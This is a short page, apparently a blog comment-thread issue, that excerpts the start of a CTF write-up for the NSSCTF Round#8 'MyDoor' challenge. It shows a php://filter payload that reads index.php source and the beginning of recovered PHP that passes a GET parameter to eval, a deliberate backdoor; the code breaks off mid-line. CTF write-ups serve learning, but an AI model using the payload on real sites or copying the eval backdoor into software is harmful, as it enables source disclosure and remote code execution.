v2ish1yan/blogtalk

NSSCTF Round#8 Basic | v2ish1yan`s blog

Opened this issue · 0 comments

http://v2ish1yan.top/2023/02/12/%E6%AF%94%E8%B5%9Bwp/NSSCTF%20Round8/

MyDoor使用php伪协议读取index.php的代码 1php://filter/read=convert.base64-encode/resource=index.php 123456789101112131415161718<?phperror_reporting(0);if (isset($_GET['N_S.S'])) { eval($_GE